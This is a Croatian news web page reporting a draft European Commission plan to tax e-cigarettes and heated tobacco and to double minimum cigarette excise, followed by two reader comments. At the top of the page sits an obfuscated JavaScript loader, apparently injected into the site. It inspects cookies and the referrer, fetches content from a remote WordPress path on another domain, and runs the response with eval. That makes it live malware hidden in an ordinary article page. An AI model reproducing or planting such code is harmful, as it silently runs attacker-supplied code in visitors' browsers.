;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Europska unija će predložiti univerzalni porez na e-cigarete u cijeloj EU

Nacrt dokumenta Europske komisije naznačio je da će Europska unija (EU) predložiti porez na e-cigarete kao dio amandmana na poreze na duhan, koji bi također udvostručio trošarine u zemljama članicama s niskim porezima na cigarete.

Do sada je porezna situacija u EU bila rascjepkana jer su različite države članice nametnule različite porezne stope na različite proizvode. I dok su proizvodi za vaping regulirani Direktivom o duhanskim proizvodima (TPD) u pogledu zdravstvenog aspekta stvari, za njih još uvijek ne postoji porezni okvir na razini cijele EU. Godine 2017. Europska komisija (EK) zatražila je konzultacije o predloženoj reviziji Direktive o trošarinama na duhan (TED) koja bi uključivala takav porez.

U veljači 2020. izvješće EK-a sugeriralo je da je taj nedostatak ujednačenosti izvor zabrinutosti iz perspektive unutarnjeg tržišta. “Na strani tržišta, razvoj se ubrzao u okviru novih e-cigareta, grijanih duhanskih proizvoda i nove generacije modernih proizvoda koji dolaze na tržište (koji sadrže nikotin ili kanabis)”, stoji u njemu. “Trenutni nedostatak usklađenosti poreznog regulatornog okvira za te proizvode također ograničava mogućnost praćenja njihovog tržišnog razvoja i kontrole njihovog kretanja.”

U tu svrhu, predložene porezne izmjene povećale bi minimalnu trošarinu u EU-u na cigarete sa 1,80 € na 3,60 € po pakiranju od 20 cigareta, podižući cijene u istočnoeuropskim zemljama gdje se pakiranja mogu prodavati za manje od 3 eura. Mađarska je, na primjer, postupno povećavala lokalni porez na duhan, čineći proizvode nedostupnima većini lokalnog stanovništva. To se dogodilo nakon što ga je Europska komisija (EK) 2019. pokrenula pred Sudom Europske unije (CJEU) zbog neprimjenjivanja minimalne potrebne trošarine na cigarete.

Predloženi porez na e-cigarete

Štoviše, ažuriranje direktive EU-a o porezu na duhan iz 2011. uvest će porez na inovativne nikotinske proizvode kao što su vape i grijani duhan. Ključna značajka ovog poreza je da će snažniji proizvodi za vaping podlijegati poreznoj pristojbi od najmanje 40% koja se primjenjuje na njih, dok će se za vape manje snage plaćati naknada od 20%. Na grijane duhanske proizvode također će utjecati naknada od 55%, odnosno porezna stopa od 91 € za 1000 prodanih artikala.

Choose your Reaction!
  • Nije mi jasno kako jedan atomizer ili vape mod(elektronska naprava) imaju veze sa duhanom.Isto tako ima e-tekučina sa 0% nikotina.

  • Imaju nacrt i plan tako da ce i realizacija krenuti. Vazno je uzimati novce. Cim vide da biznis ima potencijal odmah ga otrzavaju.

Leave a Comment